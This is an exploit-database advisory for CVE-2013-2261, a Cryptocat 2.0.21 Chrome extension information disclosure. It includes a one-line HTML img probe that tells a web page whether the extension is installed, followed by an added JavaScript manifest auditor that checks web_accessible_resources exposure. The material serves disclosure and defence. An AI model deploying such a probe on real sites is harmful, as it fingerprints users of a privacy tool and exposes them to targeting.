
Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure

Author: Mario Heiderich
type: remote
platform: multiple
port: 
date_added: 2012-11-07 
date_updated: 2015-11-05 
verified: 1 
codes: CVE-2013-2261;OSVDB-95000 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/61090/info

Cryptocat is prone to an information disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks.

Cryptocat 2.0.21 is vulnerable; other versions may also be affected.

<img src="chrome-extension://[extension-id-from-chrome-web-store]/img/keygen.gif" onload=alert(/hascat/) onerror=alert(/hasnot/) >
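
The probe above only gets an `onload` when the extension exposes the file to web pages, which Chrome decides from the extension's manifest. The following added example (not part of the original advisory or of the Cryptocat project) audits a manifest for that exposure using Chrome's documented `web_accessible_resources` rules; the function names and sample manifests are constructed for illustration.

```javascript
// Added example. Sample manifests are constructed, not Cryptocat's real manifest.

// Turn a web_accessible_resources pattern such as "img/*" into an anchored RegExp.
function globToRegExp(glob) {
  const escaped = glob.replace(/^\//, "").replace(/[.+?^${}()|[\]\\]/g, "\\$&");
  return new RegExp("^" + escaped.replace(/\*/g, ".*") + "$");
}

// Report whether a web page can load `path` from the extension, and from which origins.
function auditResource(manifest, path) {
  const target = path.replace(/^\//, "");
  if ((manifest.manifest_version || 1) < 2) {
    // Manifest v1: every packaged file is reachable from any page.
    return { probeable: true, origins: ["<all_urls>"] };
  }
  for (const entry of manifest.web_accessible_resources || []) {
    const isV2Entry = typeof entry === "string"; // MV2: string, MV3: object
    const patterns = isV2Entry ? [entry] : entry.resources || [];
    if (!patterns.some((p) => globToRegExp(p).test(target))) continue;
    // MV2 entries are open to every page; MV3 entries only to origins in `matches`.
    const origins = isV2Entry ? ["<all_urls>"] : entry.matches || [];
    if (origins.length > 0) return { probeable: true, origins };
  }
  return { probeable: false, origins: [] };
}

// Constructed manifests covering the three manifest generations.
const SAMPLES = {
  legacy: { name: "demo", version: "1.0" },
  mv2Wildcard: { manifest_version: 2, web_accessible_resources: ["img/*"] },
  mv2Locked: { manifest_version: 2, web_accessible_resources: ["css/style.css"] },
  mv3Scoped: {
    manifest_version: 3,
    web_accessible_resources: [
      { resources: ["/img/keygen.gif"], matches: ["https://chat.example/*"] },
    ],
  },
};

for (const [label, manifest] of Object.entries(SAMPLES)) {
  console.log(label, JSON.stringify(auditResource(manifest, "img/keygen.gif")));
}
```

A resource reported as probeable from `<all_urls>` lets any site test for the extension's presence; keeping it out of `web_accessible_resources`, or scoping it with `matches`, removes that signal.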